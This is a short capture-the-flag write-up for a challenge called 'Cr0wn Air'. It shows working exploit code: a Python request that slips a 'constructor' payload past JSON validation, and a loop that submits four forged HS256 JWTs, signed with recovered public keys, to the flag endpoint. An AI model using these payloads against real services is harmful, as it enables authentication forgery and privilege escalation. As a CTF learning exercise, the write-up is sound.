Cr0wn Air

There are two vulns here. A bypass to the JSON validation, and a JWT signing vulnerability. The first part is pretty simple. The app uses '"jwt-simple": "0.5.2"', which has a vulnerability allowing us to bypass the pattern validation, allowing us to gain a JWT token for a 'low privilege' user. r = requests.post(url + "checkin", json={"firstName": "a", "lastName": "b", "passport": "123456789", "ffp": "CA12345678", "extras": {"sssr" : {"sssr": "FQTU"}, "constructor": {"name":"Array"}} }) The JWT library is vulnerable to being signed as HMAC with the public key, a common vuln. However, we have no pubkey. I was stuck for ages, until I spotted (thanks Makelaris) https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/ This provided a Docker image where I could simply provide two JWT's, modify the payload in the program and run it. It pulled out the paramaters, and generated 4 potential public keys, signing my data with each. Using this:

We get the flag:

union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}`

jwts = ["eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.6ZtpFu7jGB-EM7A2L00u3iAo8qtBKHDUzVcg-Aop5Y", "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.eVHOVf5VHN8Qjxs0da8OtqtGmbRJ7Rs4BV7EL-fknMs", "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.yncoTDoKFPcSA90PBqPayLUnDhoBEIQay4A6p0tD8z8", "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdGF0dXMiOiAiZ29sZCIsICJmZnAiOiAiQ0ExMjM0NTY3OCJ9.cLVShR2bijq_NZGU4xT5wv938aaGsKW9At2TYb2-lk8"] 
for j in jwts: r = requests.post(url + "upgrades/flag", headers={"Authorization": f"Bearer {j}"}) print(r.text)

PreviousAntistatic NextHuman Server

Last updated 3 years ago